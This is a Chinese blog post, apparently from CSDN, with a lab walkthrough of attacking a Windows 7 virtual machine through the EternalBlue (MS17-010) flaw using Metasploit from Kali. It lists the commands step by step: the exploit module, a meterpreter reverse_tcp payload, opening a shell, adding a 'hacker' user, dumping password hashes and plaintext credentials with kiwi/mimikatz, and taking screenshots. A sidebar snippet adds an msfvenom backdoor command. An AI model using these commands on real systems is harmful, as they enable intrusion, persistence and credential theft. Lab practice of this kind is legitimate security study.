kail使用msf工具利用永恒之蓝漏洞攻击win7

最新推荐文章于 2024-03-12 10:47:54 发布
最新推荐文章于 2024-03-12 10:47:54 发布
阅读量788 收藏 11
点赞数 12
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73948163/article/details/135306820
版权

实验环境

靶机:win7

IP:192.168.43.144

攻击机:kali

ip:192.168.43.150

实验开始:

第一步:

打开msfconsole进入到工具里面

搜索一下永恒之蓝漏洞

search ms17_010

这上面有三个可以利用的漏洞我们选择第一个

use exploit/windows/smb/ms17_010_eternalblue

接下来我们可以查看需要设置的IP地址和端口

show options 另外Required为yes的也需要设置

set rhosts 192.168.43.144 

除此之外还需要设置payload

set payload

set payload windows/x64/meterpreter/reverse_tcp

设置完成后就进行攻击

我们输入shell就可以进入到win7的cmd

如果出现乱码的话就输入

chcp 65001

我们查看win7的IP

ipconfig

添加用户

net user hacker hacker123 /add

查看系统信息

sysinfo

还可以使用mimkatz抓取明文密码

先使用hashdump抓取密码

使用kiwi

load kiwi

查看一下帮助命令

help kiwi

 最后使用creds_all命令抓取明文密码

 

还可以使用screenshot命令截屏

这是几个渗透后可以使用的命令

其实还有很多可以执行的操作就不一一列举了

 

w1繁星
关注
  • 12
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali入侵win7.txt
07-23
整合了网络众多教程,容易出错处写的较详细,便于新手测试学习。
70-70.渗透测试-kali更新msf.mp4
最新发布
05-10
70-70.渗透测试-kali更新msf.mp4
网安尝鲜,永恒之攻击Win7演示(超详细)
qq_64545050的博客
09-06 2469
使用kali 2022.3,Windows7 x64旗舰版进行攻击演示
kali 利用msf通过win7永恒之漏洞获取权限
Snakewood的博客
10-06 7730
kali 利用msf通过win7永恒之漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应该有不少错误,还请各位大佬多包含!好久没有写过博客记录自己的学习了,今天顺手也记录一下。 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索
Kali利用msf渗透Windows电脑(超详细)
热门推荐
RFZ_322的博客
03-09 4万+
Msfvenom命令总结大全1.实时监控屏幕run vnc -i 2.打开摄像头webcam_snap 用kali入侵别人的电脑,手机,安卓,苹果,mac,linxu系统,渗透到对方电脑然后展开进攻
msf渗透测试学习-与永恒之漏洞案例
weixin_49349476的博客
06-08 4613
MSF是Metasploit Framework的缩写,是一款广泛使用的渗透测试工具,具有强大的攻击功能。它提供了一个模块化的平台,通过将各种攻击载荷、漏洞利用和辅助工具组装在一起,可用于模拟各种攻击,测试系统安全性,也可以用于执行红队实战训练、漏洞挖掘等工作。
2020-kail linux 镜像下载 及kail工具使用教程
06-26
镜像文件下载kailkail工具使用从入门到入狱使用教程
kali工具使用.pdf
09-14
kali工具使用.pdf
kali系统-工具-中文手册-html版
07-15
NMAP使用原始IP包以新颖的方式来确定哪些主机是在网络上可用,这些主机正在提供什么样的服务(应用程序的名称和版本),什么操作系统(和OS版本),它们都在运行,什么类型的分组过滤器/防火墙在使用中,和许多其他...
最新nessus kail 离线漏洞包 187M
04-13
实测nessus kail amd64加载成功的离线漏洞包 ,方便下载不成功的朋友 自行验证下是否下载完整哈 MD5 :21A29B47B199A252D6F9F0A1D50245FC SHA1 :5FF44A814C40BD6A826742D56757E7DF1F0107D0 CRC32 :55016707
Kali利用MSF渗透Win 7获取shell
舞指如歌~的博客
09-13 3393
首先在kali上制作一个后门程序,文件名为:setup.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=5050 -f exe -o setup.exe #本地监听地址及端口号:192.168.1.100:5050 为生成的文件 setup.exe 赋予可执行的权限,如果有必要可以对该文件执...
Metasploit(msf)系列-爆破模块
chaojixiaojingang
09-27 1万+
       今天关于Kali的msf系列学习了爆破模块的使用,这个还是比较简单的,爆破的工具很多,我个人还是比较喜欢用Hydra和Burp这两个工具,不过还是介绍下msf系列的爆破模块的使用,用兴趣的可以学习。 原理:        利用主机开放的一些端口服务,进而对其用户名和密码进行弱口令的爆破,例如21端口ftp服务、22端口ssh服务、23端口telnet服务、3306端口MySQL服...
记录一次Linux上kali使用msf攻击win7实验
weixin_53427088的博客
01-04 780
一般win7ping出去还是没什么问题,不过在使用kali和主机ping它的时候会出现ping不通的情况,我也是找了很多篇文章,看了别人的解决办法,大概率会是win7默认设置的原因。在win7中,一定要注意将防火墙先提前关闭,否则后面使用kali攻击是扫描不到漏洞的,在左下角搜索防火墙即可进入。本文主要记录遇到的两个配置问题,win7的ping问题还有kali攻击不进去win7,也是让我查了许久。kali安装成功后先试一下能不能够ping通win7,我两者都是使用的nat模式。
Metasploit(MSF)使用教程(以ms17_010永恒之为例)
天乐的博客
03-12 1384
Windows Vista、Windows 7、Windows 8.1、Windows 10、Windows Server 2008、Windows Server 2012和Windows Server 2016等,利用SMB协议(特别是SMBv1)的漏洞,需要目标系统开放了139或445端口。到此本文就结束了,本文仅介绍Metasploit的简单入门,更多功能自行学习探索,相信你会掌握这一款强大的渗透测试扫描神器,禁止非法扫描,后果自负。1.启动kali的nmap,探测一下靶标的455端口开放情况。
Kali--MSF-永恒之详解(复现、演示、远程、后门、加壳、修复)
m0_65712192的博客
11-01 3万+
Kali--MSF-永恒之详解(复现、演示、远程、后门、加壳、修复)
kali机利用永恒之攻击win7靶机
qq_52731059的博客
11-23 838
使用0模块,用set rhost 命令设置好目标地址,show options命令查看配置信息,配置完成后使用run命令开始攻击。1、获取win7的IP地址,打开命令窗口,输入ipconfig获取IP地址。其中有0、1、2、3、4五个选项,分别代表不同的功能。可以看见存在445端口开放,这就是本次用来攻击的端口。通过扫描发现存在可利用漏洞,继续使用0模块进行攻击。3、使用kali进入msfconsole工具。5、用3模块查找是否存在可利用漏洞。4、查找ms7-010漏洞工具。6、使用0模块进行攻击
简单到有手就行!!!Kali msfwin7永恒之漏洞
weixin_54475173的博客
01-04 1068
kali msfwindows7 永恒之
通过kail Linux给win7添加一个普通用户
06-08
1. 首先,使用Kali Linux启动Windows 7的命令行界面。这可以通过在Kali Linux中打开终端并输入以下命令来完成: ``` sudo chntpw -i /path/to/SYSTEM /path/to/SAM ``` 其中,`/path/to/SYSTEM`和`/path/to/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值